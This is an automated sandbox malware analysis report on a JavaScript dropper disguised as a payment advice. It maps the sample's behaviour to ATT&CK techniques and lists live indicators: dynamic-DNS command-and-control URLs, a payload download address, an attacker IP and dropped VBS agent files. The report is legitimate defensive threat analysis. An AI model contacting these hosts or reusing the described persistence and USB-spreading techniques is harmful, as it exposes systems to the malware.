Loading ...

Analysis Report 35Payment Advise - 201903140987758292 copy_2.js

Overview

General Information

Joe Sandbox Version:25.0.0 Tiger's Eye
Analysis ID:116875
Start date:15.03.2019
Start time:04:06:06
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 56s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:35Payment Advise - 201903140987758292 copy_2.js
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:41
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (Javascript)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.spre.troj.expl.evad.winJS@62/29@28/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .js
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, wermgr.exe, conhost.exe, CompatTelRunner.exe, svchost.exe
  • Execution Graph export aborted for target wscript.exe, PID 2440 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: javaw.exe, javaw.exe, javaw.exe, javaw.exe, javaw.exe, javaw.exe, javaw.exe, javaw.exe, javaw.exe, java.exe

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold1000 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample is looking for USB drives. Launch the sample with the USB Fake Disk cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Replication Through Removable Media1Scheduled Task1Startup Items2Startup Items2Disabling Security Tools1Credential DumpingPeripheral Device Discovery1Replication Through Removable Media1Data from Local SystemData CompressedUncommonly Used Port1
Replication Through Removable MediaScripting11Scheduled Task1Process Injection111Process Injection111Network SniffingSecurity Software Discovery41Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote Access Tools2
Drive-by CompromiseExploitation for Client Execution1Registry Run Keys / Startup Folder31Scheduled Task1Scripting11Input CaptureRemote System Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol1
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or Information2Credentials in FilesFile and Directory Discovery1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol1

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://unknownsoft.hopto.org:7755/Vre9Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/Vre;Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org/S-1-5-21-58933367-3072710494-194312298-1002_ClassesAvira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/Vre:775Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/VreH(4Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/Vrem();Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/VrepAvira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org/rameworkAvira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/Vree(Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:77Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/VreMicrosoftWindowssAvira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org/Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/VrePlxAvira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org/calhostAvira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/Vre(dpAvira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org:7755/VreDldAvira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org/D8Avira URL Cloud: Label: malware
Source: http://unknownsoft.hopto.org/cesAvira URL Cloud: Label: malware
Antivirus detection for dropped fileShow sources
Source: C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbsAvira: Label: VBS/Agent.276
Source: C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6603369485550255976.vbsAvira: Label: VBS/Agent.276
Source: C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6958446061258612657.vbsAvira: Label: VBS/Agent.281
Source: C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive7989435855425943881.vbsAvira: Label: VBS/Agent.281
Multi AV Scanner detection for domain / URLShow sources
Source: http://unknownsoft.hopto.org:7755/Vre;virustotal: Detection: 8%Perma Link
Source: http://unknownsoft.hopto.org/virustotal: Detection: 13%Perma Link

Spreading:

barindex
May infect USB drivesShow sources
Source: javaw.exe, 0000000B.00000002.8764034738.000000000AB63000.00000004.sdmpBinary or memory string: [autorun]
Source: javaw.exe, 0000000B.00000002.8764034738.000000000AB63000.00000004.sdmpBinary or memory string: autorun.inf
Enumerates the file systemShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Software Vulnerabilities:

barindex
Exploit detected, runtime environment starts unknown processesShow sources
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2020728 ET TROJAN Possible Adwind SSL Cert (assylias.Inc) 31.171.152.102:5011 -> 192.168.2.6:49854
Source: TrafficSnort IDS: 2020728 ET TROJAN Possible Adwind SSL Cert (assylias.Inc) 31.171.152.102:5011 -> 192.168.2.6:49863
Source: TrafficSnort IDS: 2020728 ET TROJAN Possible Adwind SSL Cert (assylias.Inc) 31.171.152.102:5011 -> 192.168.2.6:49869
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.6:49831 -> 41.217.32.205:7755
Uses dynamic DNS servicesShow sources
Source: unknownDNS query: name: sweetboy.duckdns.org
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: unknownsoft.hopto.org
Urls found in memory or binary dataShow sources
Source: javaw.exe, 00000006.00000002.7686161944.000000000A79B000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764220942.000000000AB84000.00000004.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp, javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.htmlp
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.htmlx&
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: javaw.exe, 00000006.00000002.7681928822.0000000005281000.00000004.sdmp, javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl#
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crlC
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 0000000B.00000002.8765357544.000000000ADBF000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8765357544.000000000ADBF000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: javaw.exe, 0000000B.00000002.8765357544.000000000ADBF000.00000004.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crlKQ
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crlC
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crls
Source: javaw.exe, 00000006.00000002.7686230337.000000000A7A6000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp, javaw.exe, 0000000F.00000002.7809678773.0000000009DA6000.00000004.sdmpString found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000006.00000002.7697063329.00000000157B4000.00000004.sdmp, javaw.exe, 00000006.00000002.7686913955.000000000A84B000.00000004.sdmp, javaw.exe, 0000000B.00000002.8769371398.00000000158F4000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp, javaw.exe, 0000000F.00000002.7810350378.0000000009E4B000.00000004.sdmp, javaw.exe, 0000000F.00000002.7812015415.00000000148C1000.00000004.sdmpString found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 00000006.00000002.7681928822.0000000005281000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmpString found in binary or memory: http://policy.camerfirma.com
Source: javaw.exe, 00000006.00000002.7698359320.0000000015D50000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmpString found in binary or memory: http://policy.camerfirma.comC
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmpString found in binary or memory: http://policy.camerfirma.comK%
Source: javaw.exe, 00000006.00000002.7681928822.0000000005281000.00000004.sdmpString found in binary or memory: http://policy.camerfirma.comKe
Source: javaw.exe, 00000006.00000002.7681928822.0000000005281000.00000004.sdmpString found in binary or memory: http://policy.camerfirma.comS
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmpString found in binary or memory: http://policy.camerfirma.comXw%
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmpString found in binary or memory: http://policy.camerfirma.comh
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmpString found in binary or memory: http://repository.swisssign.com/
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://repository.swisssign.com/#
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://repository.swisssign.com/0
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmpString found in binary or memory: http://repository.swisssign.com/3
Source: javaw.exe, 00000006.00000002.7683439064.000000000541E000.00000004.sdmpString found in binary or memory: http://repository.swisssign.com/3d
Source: javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmpString found in binary or memory: http://repository.swisssign.com/;
Source: javaw.exe, 00000006.00000002.7681928822.0000000005281000.00000004.sdmpString found in binary or memory: http://repository.swisssign.com/;b
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmpString found in binary or memory: http://repository.swisssign.com/K6
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmpString found in binary or memory: http://repository.swisssign.com/P
Source: javaw.exe, 00000006.00000002.7681928822.0000000005281000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmpString found in binary or memory: http://repository.swisssign.com/S
Source: javaw.exe, 00000006.00000002.7683439064.000000000541E000.00000004.sdmpString found in binary or memory: http://repository.swisssign.com/c
Source: javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmpString found in binary or memory: http://repository.swisssign.com/s
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmpString found in binary or memory: http://repository.swisssign.com/x
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl3
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl8
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crlC
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crlku
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmp, wscript.exe, 00000017.00000002.8908412172.000001E97BA29000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org/
Source: wscript.exe, 00000005.00000003.8720641158.0000000006390000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org/D8
Source: wscript.exe, 00000017.00000002.8908412172.000001E97BA29000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org/S-1-5-21-58933367-3072710494-194312298-1002_Classes
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org/calhost
Source: wscript.exe, 00000005.00000002.8740935538.0000000003380000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org/ces
Source: wscript.exe, 00000005.00000003.8720893365.000000000338B000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org/ramework
Source: wscript.exe, 00000005.00000002.8745764401.0000000005400000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org:77
Source: wscript.exe, 00000005.00000002.8745827512.0000000005412000.00000004.sdmp, wscript.exe, 00000005.00000003.7649806715.0000000005406000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org:7755/
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmp, wscript.exe, 00000005.00000002.8741554494.0000000003590000.00000004.sdmp, wscript.exe, 00000005.00000002.8740429180.0000000003319000.00000004.sdmp, wscript.exe, 00000005.00000002.8747742335.0000000005A00000.00000004.sdmp, wscript.exe, 00000017.00000002.8908412172.000001E97BA29000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org:7755/Vre
Source: wscript.exe, 00000005.00000002.8747742335.0000000005A00000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org:7755/Vre(dp
Source: wscript.exe, 00000005.00000002.8747742335.0000000005A00000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org:7755/Vre2
Source: wscript.exe, 00000017.00000002.8908412172.000001E97BA29000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org:7755/Vre9
Source: wscript.exe, 00000005.00000002.8747742335.0000000005A00000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org:7755/Vre:775
Source: wscript.exe, 00000005.00000003.8720893365.000000000338B000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org:7755/Vre;
Source: wscript.exe, 00000005.00000002.8740809676.000000000335B000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org:7755/VreDld
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org:7755/VreH(4
Source: wscript.exe, 00000005.00000002.8740429180.0000000003319000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org:7755/VreMicrosoftWindowss
Source: wscript.exe, 00000005.00000002.8740809676.000000000335B000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org:7755/VrePlx
Source: wscript.exe, 00000005.00000002.8747742335.0000000005A00000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org:7755/Vree(
Source: wscript.exe, 00000005.00000002.8747742335.0000000005A00000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org:7755/Vrem();
Source: wscript.exe, 00000005.00000002.8740429180.0000000003319000.00000004.sdmp, wscript.exe, 00000005.00000002.8740935538.0000000003380000.00000004.sdmpString found in binary or memory: http://unknownsoft.hopto.org:7755/Vrep
Source: javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl;
Source: javaw.exe, 00000006.00000002.7683439064.000000000541E000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crlk
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crlx
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 00000006.00000002.7681928822.0000000005281000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp, javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl;
Source: javaw.exe, 0000000F.00000002.7812015415.00000000148C1000.00000004.sdmpString found in binary or memory: http://www.chambersign.or
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmpString found in binary or memory: http://www.chambersign.org
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://www.chambersign.org1
Source: javaw.exe, 0000000B.00000002.8758951290.0000000005204000.00000004.sdmpString found in binary or memory: http://www.chambersign.orgx6
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmpString found in binary or memory: http://www.quovadis.bm
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 00000006.00000002.7683439064.000000000541E000.00000004.sdmpString found in binary or memory: http://www.quovadis.bm3D
Source: javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmpString found in binary or memory: http://www.quovadis.bm3N
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmpString found in binary or memory: http://www.quovadis.bmKL
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmpString found in binary or memory: http://www.quovadis.bmsL
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://www.quovadis.bmsy
Source: javaw.exe, 00000006.00000002.7687972623.000000000A937000.00000004.sdmp, javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps3
Source: javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps;Z
Source: javaw.exe, 00000006.00000002.7683439064.000000000541E000.00000004.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps;f
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmpString found in binary or memory: http://www.quovadisglobal.com/cpscW
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmpString found in binary or memory: http://www.quovadisglobal.com/cpsh
Source: javaw.exe, 00000006.00000002.7683439064.000000000541E000.00000004.sdmpString found in binary or memory: http://www.quovadisglobal.com/cpskn
Source: wscript.exe, 00000000.00000003.7596988648.0000000006552000.00000004.sdmp, wscript.exe, 00000000.00000002.8239276434.00000000026F1000.00000004.sdmp, wscript.exe, 00000004.00000003.7650147545.00000000063DD000.00000004.sdmpString found in binary or memory: http://www.thegoldfingerinc.com/images/jre.zip
Source: wscript.exe, 00000004.00000003.7632013252.0000000004F41000.00000004.sdmpString found in binary or memory: http://www.thegoldfingerinc.com/images/jre.zipW
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmpString found in binary or memory: https://login.live.com
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmp, javaw.exe, 0000000F.00000002.7811314706.0000000009F39000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmp, javaw.exe, 0000000F.00000002.7808917837.0000000004CCF000.00000004.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com
Source: javaw.exe, 00000006.00000002.7685520419.00000000056CE000.00000004.sdmp, javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmp, javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: javaw.exe, 0000000B.00000002.8759722138.0000000005396000.00000004.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com3?
Source: javaw.exe, 0000000B.00000002.8764255998.000000000AB88000.00000004.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com3G
Source: javaw.exe, 0000000F.00000002.7806808812.0000000004A17000.00000004.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.comC
Source: javaw.exe, 00000006.00000002.7683439064.000000000541E000.00000004.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.comk

System Summary:

barindex
Creates files inside the system directoryShow sources
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile created: C:\Windows\SysWOW64\test.txt
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3676:120:WilError_01
